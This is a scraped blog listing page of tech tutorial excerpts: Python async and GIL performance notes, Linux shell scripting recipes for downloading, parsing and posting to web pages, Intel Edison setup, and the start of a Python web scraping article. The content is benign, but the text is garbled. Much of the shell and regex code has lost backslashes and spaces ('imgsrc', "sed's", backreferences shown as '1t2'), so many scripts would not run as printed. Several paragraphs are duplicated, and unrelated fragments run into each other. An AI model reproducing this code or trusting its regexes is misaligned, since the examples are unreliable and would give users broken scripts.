import asyncio import aiopg dsn = 'dbname=aiopg user=aiopg password=passwd host=127.0.0.1' async def go(): pool = await aiopg.create_pool(dsn) async with pool.acquire() as conn: async with conn.cursor() as cur: await cur.execute("SELECT 1") ret = [] async for row in cur: ret.append(row) assert ret == [(1,)] loop = asyncio.get_event_loop() loop.run_until_complete(go()) With a few async and await prefixes, the function that's performing a SQL query and send back the result looks a lot like a synchronous function. But asynchronous frameworks and libraries based on Python 3 are still emerging, and if you are using asyncio or a framework like aiohttp, you will need to stick with particular asynchronous implementations for each feature you need. If you require using a library that is not asynchronous in your code, using it from your asynchronous code means you will need to go through some extra and challenging work if you want to prevent blocking the event loop. If your microservices are dealing with a limited number of resources, it could be manageable. But it's probably a safer bet at this point (2017) to stick with a synchronous framework that's been around for a while rather than an asynchronous one. Let's enjoy the existing ecosystem of mature packages, and wait until the asyncio ecosystem gets more sophisticated. And there are many great synchronous frameworks to build microservices with Python, like Bottle, Pyramid with Cornice or Flask. Language performances In the previous sections we've been through the two different ways to write microservices - asynchronous vs. synchronous, and whatever technique you are using, the speed of Python is directly impacting the performance of your microservice. Of course, everyone knows Python is slower than Java or Go - but execution speed is not always the top priority. A microservice is often a thin layer of code that is sitting most of its life waiting for some network responses from other services. Its core speed is usually less important than how fast your SQL queries will take to return from your Postgres server because the latter will represent most of the time spent to build the response. But wanting an application that's as fast as possible is legitimate. One controversial topic in the Python community around speeding up the language is how the Global Interpreter Lock (GIL) mutex can ruin performances because multi-threaded applications cannot use several processes. The GIL has good reasons to exist. It protects non thread-safe parts of the CPython interpreter and exists in other languages like Ruby. And all attempts to remove it so far have failed to produce a faster CPython implementation. Larry Hasting is working on a GIL-free CPython project called Gilectomy - https://github.com/larryhastings/gilectomy - its minimal goal is to come up with a GIL-free implementation that can run a single-threaded application as fast as CPython. As of today (2017), this implementation is still slower that CPython. But it's interesting to follow this work and see if it reaches speed parity one day. That would make a GIL-free CPython very appealing. For microservices, besides preventing the usage of multiple cores in the same process, the GIL will slightly degrade performances on high load, because of the system calls overhead introduced by the mutex. Although, all the scrutiny around the GIL had one beneficial impact: some work has been done in the past years to reduce its contention in the interpreter, and in some area, Python performances have improved a lot. But bear in mind that even if the core team removes the GIL, Python is an interpreted language and the produced code will never be very efficient at execution time. Python provides the dis module if you are interested to see how the interpreter decomposes a function. In the example below, the interpreter will decompose a simple function that yields incremented values from a sequence in no less than 29 steps! >>> def myfunc(data): ... for value in data: ... yield value + 1 ... >>> import dis >>> dis.dis(myfunc) 2 0 SETUP_LOOP 23 (to 26) 3 LOAD_FAST 0 (data) 6 GET_ITER >> 7 FOR_ITER 15 (to 25) 10 STORE_FAST 1 (value) 3 13 LOAD_FAST 1 (value) 16 LOAD_CONST 1 (1) 19 BINARY_ADD 20 YIELD_VALUE 21 POP_TOP 22 JUMP_ABSOLUTE 7 >> 25 POP_BLOCK >> 26 LOAD_CONST 0 (None) 29 RETURN_VALUE A similar function written in a statically compiled language will dramatically reduce the number of operations required to produce the same result. There are ways to speed up Python execution, though. One is to write part of your code into compiled code by building C extensions or using a static extension of the language like Cython (http://cython.org/) - but that makes your code more complicated. Another solution, which is the most promising one, is by simply running your application using the PyPy interpreter (http://pypy.org/). PyPy implements a Just-In-Time compiler (JIT). This compiler is directly replacing at run time pieces of Python with machine code that can be directly used by the CPU. The whole trick for the JIT is to detect in real time, ahead of the execution, when and how to do it. Even if PyPy is always a few Python versions behind CPython, it reached a point where you can use it in production, and its performances can be quite amazing. In one of our projects at Mozilla that needs fast execution, the PyPy version was almost as fast as the Go version, and we've decided to use Python there instead. The Pypy Speed Center website is a great place to look at how PyPy compares to CPython - http://speed.pypy.org/ However, if your program uses C extensions, you will need to recompile them for PyPy, and that can be a problem. In particular, if other developers maintain some of the extensions you are using. But if you are building your microservice with a standard set of libraries, the chances are that will it work out of the box with the PyPy interpreter, so that's worth a try. In any case, for most projects, the benefits of Python and its ecosystem largely surpasses the performances issues described in this section because the overhead in a microservice is rarely a problem. Summary In this article we saw that Python is considered to be one of the best languages to write web applications, and therefore microservices - for the same reasons, it's a language of choice in other areas and also because it provides tons of mature frameworks and packages to do the work. Resources for Article: Further resources on this subject: Inbuilt Data Types in Python [article] Getting Started with Python Packages [article] Layout Management for Python GUI [article]

0
0
42735

Packt

22 Jun 2017

20 min read

Tangled Web? Not At All!

Packt

22 Jun 2017

20 min read

In this article by Clif Flynt, the author of the book Linux Shell Scripting Cookbook - Third Edition, we can see a collection of shell-scripting recipes that talk to services on the Internet. This articleis intended to help readers understand how to interact with the Web using shell scripts to automate tasks such as collecting and parsing data from web pages. This is discussed using POST and GET to web pages, writing clients to web services. (For more resources related to this topic, see here.) In this article, we will cover the following recipes: Downloading a web page as plain text Parsing data from a website Image crawler and downloader Web photo album generator Twitter command-line client Tracking changes to a website Posting to a web page and reading response Downloading a video from the Internet The Web has become the face of technology and the central access point for data processing. The primary interface to the web is via a browser that's designed for interactive use. That's great for searching and reading articles on the web, but you can also do a lot to automate your interactions with shell scripts. For instance, instead of checking a website daily to see if your favorite blogger has added a new blog, you can automate the check and be informed when there's new information. Similarly, twitter is the current hot technology for getting up-to-the-minute information. But if I subscribe to my local newspaper's twitter account because I want the local news, twitter will send me all news, including high-school sports that I don't care about. With a shell script, I can grab the tweets and customize my filters to match my desires, not rely on their filters. Downloading a web page as plain text Web pages are simply text with HTML tags, JavaScript and CSS. The HTML tags define the content of a web page, which we can parse for specific content. Bash scripts can parse web pages. An HTML file can be viewed in a web browser to see it properly formatted. Parsing a text document is simpler than parsing HTML data because we aren't required to strip off the HTML tags. Lynx is a command-line web browser which download a web page as plaintext. Getting Ready Lynx is not installed in all distributions, but is available via the package manager. # yum install lynx or apt-get install lynx How to do it... Let's download the webpage view, in ASCII character representation, in a text file by using the -dump flag with the lynx command: $ lynx URL -dump > webpage_as_text.txt This command will list all the hyperlinks <a href="link"> separately under a heading References, as the footer of the text output. This lets us parse links separately with regular expressions. For example: $lynx -dump http://google.com > plain_text_page.txt You can see the plaintext version of text by using the cat command: $ cat plain_text_page.txt Search [1]Images [2]Maps [3]Play [4]YouTube [5]News [6]Gmail [7]Drive [8]More » [9]Web History | [10]Settings | [11]Sign in [12]St. Patrick's Day 2017 _______________________________________________________ Google Search I'm Feeling Lucky [13]Advanced search [14]Language tools [15]Advertising Programs [16]Business Solutions [17]+Google [18]About Google © 2017 - [19]Privacy - [20]Terms References Parsing data from a website The lynx, sed, and awk commands can be used to mine data from websites. How to do it... Let's go through the commands used to parse details of actresses from the website: $ lynx -dump -nolist http://www.johntorres.net/BoxOfficefemaleList.html | grep -o "Rank-.*" | sed -e 's/ *Rank-([0-9]*) *(.*)/1t2/' | sort -nk 1 > actresslist.txt The output is: # Only 3 entries shown. All others omitted due to space limits 1 Keira Knightley 2 Natalie Portman 3 Monica Bellucci How it works... Lynx is a command-line web browser—it can dump a text version of a website as we would see in a web browser, instead of returning the raw html as wget or cURL do. This saves the step of removing HTML tags. The -nolist option shows the links without numbers. Parsing and formatting the lines that contain Rank is done with sed: sed -e 's/ *Rank-([0-9]*) *(.*)/1t2/' These lines are then sorted according to the ranks. See also The Downloading a web page as plain text recipe in this article explains the lynx command. Image crawler and downloader Image crawlers download all the images that appear in a web page. Instead of going through the HTML page by hand to pick the images, we can use a script to identify the images and download them automatically. How to do it... This Bash script will identify and download the images from a web page: #!/bin/bash #Desc: Images downloader #Filename: img_downloader.sh if [ $# -ne 3 ]; then echo "Usage: $0 URL -d DIRECTORY" exit -1 fi while [ -n $1 ] do case $1 in -d) shift; directory=$1; shift ;; *) url=$1; shift;; esac done mkdir -p $directory; baseurl=$(echo $url | egrep -o "https?://[a-z.-]+") echo Downloading $url curl -s $url | egrep -o "<imgsrc=[^>]*>" | sed's/<imgsrc="([^"]*).*/1/g' | sed"s,^/,$baseurl/,"> /tmp/$$.list cd $directory; while read filename; do echo Downloading $filename curl -s -O "$filename" --silent done < /tmp/$$.list An example usage is: $ ./img_downloader.sh http://www.flickr.com/search/?q=linux -d images How it works... The image downloader script reads an HTML page, strips out all tags except <img>, parses src="URL" from the <img> tag, and downloads them to the specified directory. This script accepts a web page URL and the destination directory as command-line arguments. The [ $# -ne 3 ] statement checks whether the total number of arguments to the script is three, otherwise it exits and returns a usage example. Otherwise, this code parses the URL and destination directory: while [ -n "$1" ] do case $1 in -d) shift; directory=$1; shift ;; *) url=${url:-$1}; shift;; esac done The while loop runs until all the arguments are processed. The shift command shifts arguments to the left so that $1 will take the next argument's value; that is, $2, and so on. Hence, we can evaluate all arguments through $1 itself. The case statement checks the first argument ($1). If that matches -d, the next argument must be a directory name, so the arguments are shifted and the directory name is saved. If the argument is any other string it is a URL. The advantage of parsing arguments in this way is that we can place the -d argument anywhere in the command line: $ ./img_downloader.sh -d DIR URL Or: $ ./img_downloader.sh URL -d DIR The egrep -o "<imgsrc=[^>]*>"code will print only the matching strings, which are the <img> tags including their attributes. The phrase [^>]*matches all the characters except the closing >, that is, <imgsrc="image.jpg">. sed's/<imgsrc="([^"]*).*/1/g' extracts the url from the string src="url". There are two types of image source paths—relative and absolute. Absolute paths contain full URLs that start with http:// or https://. Relative URLs starts with / or image_name itself. An example of an absolute URL is http://example.com/image.jpg. An example of a relative URL is /image.jpg. For relative URLs, the starting / should be replaced with the base URL to transform it to http://example.com/image.jpg. The script initializes the baseurl by extracting it from the initial url with the command: baseurl=$(echo $url | egrep -o "https?://[a-z.-]+") The output of the previously described sed command is piped into another sed command to replace a leading / with the baseurl, and the results are saved in a file named for the script's PID: /tmp/$$.list. sed"s,^/,$baseurl/,"> /tmp/$$.list The final while loop iterates through each line of the list and uses curl to downloas the images. The --silent argument is used with curl to avoid extra progress messages from being printed on the screen. The final while loop iterates through each line of the list and uses curl to downloas the images. The --silent argument is used with curl to avoid extra progress messages from being printed on the screen. Web photo album generator Web developers frequently create photo albums of full sized and thumbnail images. When a thumbnail is clicked, a large version of the picture is displayed. This requires resizing and placing many images. These actions can be automated with a simple bash script. The script creates thumbnails, places them in exact directories, and generates the code fragment for <img> tags automatically. Web developers frequently create photo albums of full sized and thumbnail images. When a thumbnail is clicked, a large version of the picture is displayed. This requires resizing and placing many images. These actions can be automated with a simple bash script. The script creates thumbnails, places them in exact directories, and generates the code fragment for <img> tags automatically. Getting ready This script uses a for loop to iterate over every image in the current directory. The usual Bash utilities such as cat and convert (from the Image Magick package) are used. These will generate an HTML album, using all the images, in index.html. How to do it... This Bash script will generate an HTML album page: #!/bin/bash #Filename: generate_album.sh #Description: Create a photo album using images in current directory echo "Creating album.." mkdir -p thumbs cat <<EOF1 > index.html <html> <head> <style> body { width:470px; margin:auto; border: 1px dashed grey; padding:10px; } img { margin:5px; border: 1px solid black; } </style> </head> <body> <center><h1> #Album title </h1></center> <p> EOF1 for img in *.jpg; do convert "$img" -resize "100x""thumbs/$img" echo "<a href="$img">">>index.html echo "<imgsrc="thumbs/$img" title="$img" /></a>">> index.html done cat <<EOF2 >> index.html </p> </body> </html> EOF2 echo Album generated to index.html Run the script as follows: $ ./generate_album.sh Creating album.. Album generated to index.html How it works... The initial part of the script is used to write the header part of the HTML page. The following script redirects all the contents up to EOF1 to index.html: cat <<EOF1 > index.html contents... EOF1 The header includes the HTML and CSS styling. for img in *.jpg *.JPG; iterates over the file names and evaluates the body of the loop. convert "$img" -resize "100x""thumbs/$img" creates images of 100 px width as thumbnails. The following statements generate the required <img> tag and appends it to index.html: echo "<a href="$img">" echo "<imgsrc="thumbs/$img" title="$img" /></a>">> index.html Finally, the footer HTML tags are appended with cat as done in the first part of the script. Twitter command-line client Twitter is the hottest micro-blogging platform, as well as the latest buzz of the online social media now. We can use Twitter API to read tweets on our timeline from the command line! Twitter is the hottest micro-blogging platform, as well as the latest buzz of the online social media now. We can use Twitter API to read tweets on our timeline from the command line! Let's see how to do it. Getting ready Recently, Twitter stopped allowing people to log in by using plain HTTP Authentication, so we must use OAuth to authenticate ourselves. Perform the following steps: Download the bash-oauth library from https://github.com/livibetter/bash-oauth/archive/master.zip, and unzip it to any directory. Go to that directory and then inside the subdirectory bash-oauth-master, run make install-all as root.Go to https://apps.twitter.com/ and register a new app. This will make it possible to use OAuth. After registering the new app, go to your app's settings and change Access type to Read and Write. Now, go to the Details section of the app and note two things—Consumer Key and Consumer Secret, so that you can substitute these in the script we are going to write. Great, now let's write the script that uses this. How to do it... This Bash script uses the OAuth library to read tweets or send your own updates. #!/bin/bash #Filename: twitter.sh #Description: Basic twitter client oauth_consumer_key=YOUR_CONSUMER_KEY oauth_consumer_scret=YOUR_CONSUMER_SECRET config_file=~/.$oauth_consumer_key-$oauth_consumer_secret-rc if [[ "$1" != "read" ]] && [[ "$1" != "tweet" ]]; then echo -e "Usage: $0 tweet status_messagen ORn $0 readn" exit -1; fi #source /usr/local/bin/TwitterOAuth.sh source bash-oauth-master/TwitterOAuth.sh TO_init if [ ! -e $config_file ]; then TO_access_token_helper if (( $? == 0 )); then echo oauth_token=${TO_ret[0]} > $config_file echo oauth_token_secret=${TO_ret[1]} >> $config_file fi fi source $config_file if [[ "$1" = "read" ]]; then TO_statuses_home_timeline'''YOUR_TWEET_NAME''10' echo $TO_ret | sed's/,"/n/g' | sed's/":/~/' | awk -F~ '{} {if ($1 == "text") {txt=$2;} else if ($1 == "screen_name") printf("From: %sn Tweet: %snn", $2, txt);} {}' | tr'"''' elif [[ "$1" = "tweet" ]]; then shift TO_statuses_update''"$@" echo 'Tweeted :)' fi Run the script as follows: $./twitter.sh read Please go to the following link to get the PIN: https://api.twitter.com/oauth/authorize?oauth_token=LONG_TOKEN_STRING PIN: PIN_FROM_WEBSITE Now you can create, edit and present Slides offline. - by A Googler $./twitter.sh tweet "I am reading Packt Shell Scripting Cookbook" Tweeted :) $./twitter.sh read | head -2 From: Clif Flynt Tweet: I am reading Packt Shell Scripting Cookbook How it works... First of all, we use the source command to include the TwitterOAuth.sh library, so we can use its functions to access Twitter. The TO_init function initializes the library. Every app needs to get an OAuth token and token secret the first time it is used. If these are not present, we use the library function TO_access_token_helper to acquire them. Once we have the tokens, we save them to a config file so we can simply source it the next time the script is run. The library function TO_statuses_home_timeline fetches the tweets from Twitter. This data is retuned as a single long string in JSON format, which starts like this: [{"created_at":"Thu Nov 10 14:45:20 +0000 "016","id":7...9,"id_str":"7...9","text":"Dining... Each tweet starts with the created_at tag and includes a text and a screen_nametag. The script will extract the text and screen name data and display only those fields. The script assigns the long string to the variable TO_ret. The JSON format uses quoted strings for the key and may or may not quote the value. The key/value pairs are separated by commas, and the key and value are separated by a colon :. The first sed to replaces each," character set with a newline, making each key/value a separate line. These lines are piped to another sed command to replace each occurrence of ": with a tilde ~ which creates a line like screen_name~"Clif_Flynt" The final awk script reads each line. The -F~ option splits the line into fields at the tilde, so $1 is the key and $2 is the value. The if command checks for text or screen_name. The text is first in the tweet, but it's easier to read if we report the sender first, so the script saves a text return until it sees a screen_name, then prints the current value of $2 and the saved value of the text. The TO_statuses_updatelibrary function generates a tweet. The empty first parameter defines our message as being in the default format, and the message is a part of the second parameter. Tracking changes to a website Tracking website changes is useful to both web developers and users. Checking a website manually impractical, but a change tracking script can be run at regular intervals. When a change occurs, it generate a notification. Getting ready Tracking changes in terms of Bash scripting means fetching websites at different times and taking the difference by using the diff command. We can use curl and diff to do this. How to do it... This bash script combines different commands, to track changes in a webpage: #!/bin/bash #Filename: change_track.sh #Desc: Script to track changes to webpage if [ $# -ne 1 ]; then echo -e "$Usage: $0 URLn" exit 1; fi first_time=0 # Not first time if [ ! -e "last.html" ]; then first_time=1 # Set it is first time run fi curl --silent $1 -o recent.html if [ $first_time -ne 1 ]; then changes=$(diff -u last.html recent.html) if [ -n "$changes" ]; then echo -e "Changes:n" echo "$changes" else echo -e "nWebsite has no changes" fi else echo "[First run] Archiving.." fi cp recent.html last.html Let's look at the output of the track_changes.sh script on a website you control. First we'll see the output when a web page is unchanged, and then after making changes. Note that you should change MyWebSite.org to your website name. First, run the following command: $ ./track_changes.sh http://www.MyWebSite.org [First run] Archiving.. Second, run the command again. $ ./track_changes.sh http://www.MyWebSite.org Website has no changes Third, run the following command after making changes to the web page: $ ./track_changes.sh http://www.MyWebSite.org Changes: --- last.html 2010-08-01 07:29:15.000000000 +0200 +++ recent.html 2010-08-01 07:29:43.000000000 +0200 @@ -1,3 +1,4 @@ +added line :) data How it works... The script checks whether the script is running for the first time by using [ ! -e "last.html" ];. If last.html doesn't exist, it means that it is the first time and, the webpage must be downloaded and saved as last.html. If it is not the first time, it downloads the new copy recent.html and checks the difference with the diff utility. Any changes will be displayed as diff output.Finally, recent.html is copied to last.html. Note that changing the website you're checking will generate a huge diff file the first time you examine it. If you need to track multiple pages, you can create a folder for each website you intend to watch. Posting to a web page and reading the response POST and GET are two types of requests in HTTP to send information to, or retrieve information from a website. In a GET request, we send parameters (name-value pairs) through the webpage URL itself. The POST command places the key/value pairs in the message body instead of the URL. POST is commonly used when submitting long forms or to conceal the information submitted from a casual glance. Getting ready For this recipe, we will use the sample guestbook website included in the tclhttpd package. You can download tclhttpd from http://sourceforge.net/projects/tclhttpd and then run it on your local system to create a local webserver. The guestbook page requests a name and URL which it adds to a guestbook to show who has visited a site when the user clicks the Add me to your guestbook button. This process can be automated with a single curl (or wget) command. How to do it... Download the tclhttpd package and cd to the bin folder. Start the tclhttpd daemon with this command: tclsh httpd.tcl The format to POST and read the HTML response from generic website resembles this: $ curl URL -d "postvar=postdata2&postvar2=postdata2" Consider the following example: $ curl http://127.0.0.1:8015/guestbook/newguest.html -d "name=Clif&url=www.noucorp.com&http=www.noucorp.com" curl prints a response page like this: <HTML> <Head> <title>Guestbook Registration Confirmed</title> </Head> <Body BGCOLOR=white TEXT=black> <a href="www.noucorp.com">www.noucorp.com</a> <DL> <DT>Name <DD>Clif <DT>URL <DD> </DL> www.noucorp.com </Body> -d is the argument used for posting. The string argument for -d is similar to the GET request semantics. var=value pairs are to be delimited by &. You can POST the data using wget by using --post-data "string". For example: $ wgethttp://127.0.0.1:8015/guestbook/newguest.cgi --post-data "name=Clif&url=www.noucorp.com&http=www.noucorp.com" -O output.html Use the same format as cURL for name-value pairs. The text in output.html is the same as that returned by the cURL command. The string to the post arguments (for example, to -d or --post-data) should always be given in quotes. If quotes are not used, & is interpreted by the shell to indicate that this should be a background process. How to do it... If you look at the website source (use the View Source option from the web browser), you will see an HTML form defined, similar to the following code: <form action="newguest.cgi"" method="post"> <ul> <li> Name: <input type="text" name="name" size="40"> <li> Url: <input type="text" name="url" size="40"> <input type="submit"> </ul> </form> Here, newguest.cgi is the target URL. When the user enters the details and clicks on the Submit button, the name and url inputs are sent to newguest.cgi as a POST request, and the response page is returned to the browser. Downloading a video from the internet There are many reasons for downloading a video. If you are on a metered service, you might want to download videos during off-hours when the rates are cheaper. You might want to watch videos where the bandwidth doesn't support streaming, or you might just want to make certain that you always have that video of cute cats to show your friends. Getting ready One program for downloading videos is youtube-dl. This is not included in most distributions and the repositories may not be up to date, so it's best to go to the youtube-dl main site:http://yt-dl.org You'll find links and information on that page for downloading and installing youtube-dl. How to do it… Using youtube-dl is easy. Open your browser and find a video you like. Then copy/paste that URL to the youtube-dl command line. youtube-dl https://www.youtube.com/watch?v=AJrsl3fHQ74 While youtube-dl is downloading the file it will generate a status line on your terminal. How it works… The youtube-dl program works by sending a GET message to the server, just as a browser would do. It masquerades as a browser so that YouTube or other video providers will download a video as if the device were streaming. The –list-formats (-F) option will list the available formats a video is available in, and the –format (-f) option will specify which format to download. This is useful if you want to download a higher-resolution video than your internet connection can reliably stream. Summary In this article we learned how to download and parse website data, send data to forms, and automate website-usage tasks and similar activities. We can automate many activities that we perform interactively through a browser with a few lines of scripting. Resources for Article: Further resources on this subject: Linux Shell Scripting – various recipes to help you [article] Linux Shell Script: Tips and Tricks [article] Linux Shell Script: Monitoring Activities [article]

0
0
33382

article-image-string-encryption-and-decryption

Packt

22 Jun 2017

21 min read

String Encryption and Decryption

Packt

22 Jun 2017

21 min read

0
0
13052

Packt

21 Jun 2017

8 min read

Setting up Intel Edison

Packt

21 Jun 2017

8 min read

In this article by Avirup Basu, the author of the book Intel Edison Projects, we will be covering the following topics: Setting up the Intel Edison Setting up the developer environment (For more resources related to this topic, see here.) In every Internet of Things(IoT) or robotics project, we have a controller that is the brain of the entire system. Similarly we have Intel Edison. The Intel Edison computing module comes in two different packages. One of which is a mini breakout board the other of which is an Arduino compatible board. One can use the board in its native state as well but in that case the person has to fabricate his/hers own expansion board. The Edison is basically a size of a SD card. Due to its tiny size, it's perfect for wearable devices. However it's capabilities makes it suitable for IoT application and above all, the powerful processing capability makes it suitable for robotics application. However we don't simply use the device in this state. We hook up the board with an expansion board. The expansion board provides the user with enough flexibility and compatibility for interfacing with other units. The Edison has an operating system that is running the entire system. It runs a Linux image. Thus, to setup your device, you initially need to configure your device both at the hardware and at software level. Initial hardware setup We'll concentrate on the Edison package that comes with an Arduino expansion board. Initially you will get two different pieces: The Intel® Edison board The Arduino expansion board The following given is the architecture of the device: Architecture of Intel Edison. Picture Credits: https://software.intel.com/en-us/ We need to hook these two pieces up in a single unit. Place the Edison board on top of the expansion board such that the GPIO interfaces meet at a single point. Gently push the Edison against the expansion board. You will get a click sound. Use the screws that comes with the package to tighten the set up. Once, this is done, we'll now setup the device both at hardware level and software level to be used further. Following are the steps we'll cover in details: Downloading necessary software packages Connecting your Intel® Edison to your PC Flashing your device with the Linux image Connecting to a Wi-Fi network SSH-ing your Intel® Edison device Downloading necessary software packages To move forward with the development on this platform, we need to download and install a couple of software which includes the drivers and the IDEs. Following is the list of the software along with the links that are required: Intel® Platform Flash Tool Lite (https://01.org/android-ia/downloads/intel-platform-flash-tool-lite) PuTTY (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html) Intel XDK for IoT (https://software.intel.com/en-us/intel-xdk) Arduino IDE (https://www.arduino.cc/en/Main/Software) FileZilla FTP client (https://filezilla-project.org/download.php) Notepad ++ or any other editor (https://notepad-plus-plus.org/download/v7.3.html) Drivers and miscellaneous downloads Latest Yocto* Poky image Windows standalone driver for Intel Edison FTDI drivers (http://www.ftdichip.com/Drivers/VCP.htm) The 1st and the 2nd packages can be downloaded from (https://software.intel.com/en-us/iot/hardware/edison/downloads) Plugging in your device After all the software and drivers installation, we'll now connect the device to a PC. You need two Micro-B USB Cables(s) to connect your device to the PC. You can also use a 9V power adapter and a single Micro-B USB Cable, but for now we will not use the power adapter: Different sections of Arduino expansion board of Intel Edison A small switch exists between the USB port and the OTG port. This switch must be towards the OTG port because we're going to power the device from the OTG port and not through the DC power port. Once it is connected to your PC, open your device manager and expands the ports section. If all installations of drivers were successful, then you must see two ports: Intel Edison virtual com port USB serial port Flashing your device Once your device is successfully detected an installed, you need to flash your device with the Linux image. For this we'll use the flash tool provided by Intel: Open the flash lite tool and connect your device to the PC: Intel phone flash lite tool Once the flash tool is opened, click on Browse... and browse to the .zip file of the Linux image you have downloaded. After you click on OK, the tool will automatically unzip the file. Next, click on Start to flash: Intel® Phone flash lite tool – stage 1 You will be asked to disconnect and reconnect your device. Do as the tool says and the board should start flashing. It may take some time before the flashing is completed. You are requested not to tamper with the device during the process. Once the flashing is completed, we'll now configure the device: Intel® Phone flash lite tool – complete Configuring the device After flashing is successfully we'll now configure the device. We're going to use the PuTTY console for the configuration. PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows platform. We're going to use the serial section here. Before opening PuTTY console: Open up the device manager and note the port number for USB serial port. This will be used in your PuTTY console: Ports for Intel® Edison in PuTTY Next select Serialon PuTTY console and enter the port number. Use a baud rate of 115200. Press Open to open the window for communicating with the device: PuTTY console – login screen Once you are in the console of PuTTY, then you can execute commands to configure your Edison. Following is the set of tasks we'll do in the console to configure the device: Provide your device a name Provide root password (SSH your device) Connect your device to Wi-Fi Initially when in the console, you will be asked to login. Type in root and press Enter. Once entered you will see root@edison which means that you are in the root directory: PuTTY console – login success Now, we are in the Linux Terminal of the device. Firstly, we'll enter the following command for setup: configure_edison –setup Press Enter after entering the command and the entire configuration will be somewhat straightforward: PuTTY console – set password Firstly, you will be asked to set a password. Type in a password and press Enter. You need to type in your password again for confirmation. Next, we'll set up a name for the device: PuTTY console – set name Give a name for your device. Please note that this is not the login name for your device. It's just an alias for your device. Also the name should be at-least 5 characters long. Once you entered the name, it will ask for confirmation press y to confirm. Then it will ask you to setup Wi-Fi. Again select y to continue. It's not mandatory to setup Wi-Fi, but it's recommended. We need the Wi-Fi for file transfer, downloading packages, and so on: PuTTY console – set Wi-Fi Once the scanning is completed, we'll get a list of available networks. Select the number corresponding to your network and press Enter. In this case it 5 which corresponds to avirup171which is my Wi-Fi. Enter the network credentials. After you do that, your device will get connected to the Wi-Fi. You should get an IP after your device is connected: PuTTY console – set Wi-Fi -2 After successful connection you should get this screen. Make sure your PC is connected to the same network. Open up the browser in your PC, and enter the IP address as mentioned in the console. You should get a screen similar to this: Wi-Fi setup – completed Now, we are done with the initial setup. However Wi-Fi setup normally doesn't happens in one go. Sometimes your device doesn't gets connected to the Wi-Fi and sometimes we cannot get this page as shown before. In those cases you need to start wpa_cli to manually configure the Wi-Fi. Refer to the following link for the details: http://www.intel.com/content/www/us/en/support/boards-and-kits/000006202.html Summary In this article, we have covered the areas of initial setup of Intel Edison and configuring it to the network. We have also covered how to transfer files to the Edison and vice versa. Resources for Article: Further resources on this subject: Getting Started with Intel Galileo [article] Creating Basic Artificial Intelligence [article] Using IntelliTrace to Diagnose Problems with a Hosted Service [article]

0
0
26088

How-To Tutorials

Packt

20 Jun 2017

12 min read

What are Microservices?

Packt

20 Jun 2017

12 min read

0
0
30666

Packt

20 Jun 2017

14 min read

CORS in Node.js

Packt

20 Jun 2017

14 min read

0
0
25710

How-To Tutorials

article-image-grouping-sets-advanced-sql

Packt

20 Jun 2017

6 min read

Grouping Sets in Advanced SQL

Packt

20 Jun 2017

6 min read

0
0
2721

Packt

20 Jun 2017

11 min read

Scraping a Web Page

Packt

20 Jun 2017

11 min read

In this article by Katharine Jarmul author of the book Python Web Scraping - Second Edition we can look at some example as suppose I have a shop selling shoes and want to keep track of my competitor's prices. I could go to my competitor's website each day and compare each shoe's price with my own, however this will take a lot of time and will not scale well if I sell thousands of shoes or need to check price changes frequently. Or maybe I just want to buy a shoe when it's on sale. I could come back and check the shoe website each day until I get lucky, but the shoe I want might not be on sale for months. These repetitive manual processes could instead be replaced with an automated solution using the web scraping techniques covered in this book. In an ideal world, web scraping wouldn't be necessary and each website would provide an API to share the data in a structured format. Indeed, some websites do provide APIs, but they typically restrict the data that is available and how frequently it can be accessed. Additionally, a website developer might change, remove or restrict the backend API. In short, we cannot rely on APIs to access the online data we may want and therefore, we need to learn about web scraping techniques. (For more resources related to this topic, see here.) Three approaches to scrape a web page Now that we understand the structure of this web page we will investigate three different approaches to scraping its data, first with regular expressions, then with the popular BeautifulSoup module, and finally with the powerful lxml module. Regular expressions If you are unfamiliar with regular expressions or need a reminder, there is a thorough overview available at (https://docs.python.org/3/howto/regex.html). Even if you use regular expressions (or regex) with another programming language, I recommend stepping through it for a refresher on regex with Python. To scrape the country area using regular expressions, we will first try matching the contents of the <td> element, as follows: >>> import re >>> from advanced_link_crawler import download >>> url = 'http://example.webscraping.com/view/UnitedKingdom-239' >>> html = download(url) >>> re.findall(r'(.*?)', html) ['<'img src="/places/static/images/flags/gb.png" />', '244,820 square kilometres', '62,348,447', 'GB', 'United Kingdom', 'London', 'EU', '.uk', 'GBP', 'Pound', '44', '@# #@@|@## #@@|@@# #@@|@@## #@@|@#@ #@@|@@#@ #@@|GIR0AA', '^(([A-Z]\d{2}[A-Z]{2})|([A-Z]\d{3}[A-Z]{2})|([A-Z]{2}\d{2} [A-Z]{2})|([A-Z]{2}\d{3}[A-Z]{2})|([A-Z]\d[A-Z]\d[A-Z]{2}) |([A-Z]{2}\d[A-Z]\d[A-Z]{2})|(GIR0AA))$', 'en-GB,cy-GB,gd', 'IE '] This result shows that thetag is used for multiple country attributes. If we simply wanted to scrape the country area, we can select the second matching element, as follows: >>> re.findall('(.*?)', html)[1]'244,820 square kilometres' This solution works but could easily fail if the web page is updated. Consider if this table is changed and the area is no longer in the second matching element. If we just need to scrape the data now, future changes can be ignored. However, if we want to rescrape this data at some point, we want our solution to be as robust against layout changes as possible. To make this regular expression more specific, we can include the parentelement, which has an ID, so it ought to be unique: >>> re.findall(' Area: (.*?) ', html) ['244,820 square kilometres'] This iteration is better; however, there are many other ways the web page could be updated in a way that still breaks the regular expression. For example, double quotation marks might be changed to single, extra spaces could be added between the tags, or the area_label could be changed. Here is an improved version to try and support these various possibilities: >>> re.findall('''.*?<tds*class=["']w2p_fw["']>(.*?) ''', html) ['244,820 square kilometres'] This regular expression is more future-proof but is difficult to construct, and quite unreadable. Also, there are still plenty of other minor layout changes that would break it, such as if a title attribute was added to the <td> tag or if the tr or td elements changed their CSS classes or IDs. From this example, it is clear that regular expressions provide a quick way to scrape data but are too brittle and easily break when a web page is updated. Fortunately, there are better data extraction solutions such as. Beautiful Soup Beautiful Soup is a popular library that parses a web page and provides a convenient interface to navigate content. If you do not already have this module, the latest version can be installed using this command: pip install beautifulsoup4 The first step with Beautiful Soup is to parse the downloaded HTML into a soup document. Many web pages do not contain perfectly valid HTML and Beautiful Soup needs to correct improper open and close tags. For example, consider this simple web page containing a list with missing attribute quotes and closing tags: <ul class=country> <li>Area <li>Population </ul> If the Population item is interpreted as a child of the Area item instead of the list, we could get unexpected results when scraping. Let us see how Beautiful Soup handles this: >>> from bs4 import BeautifulSoup >>> broken_html = '<ul class=country><li>Area<li>Population</ul>' >>> # parse the HTML >>> soup = BeautifulSoup(broken_html, 'html.parser') >>> fixed_html = soup.prettify() >>> print(fixed_html) <ul class="country"> 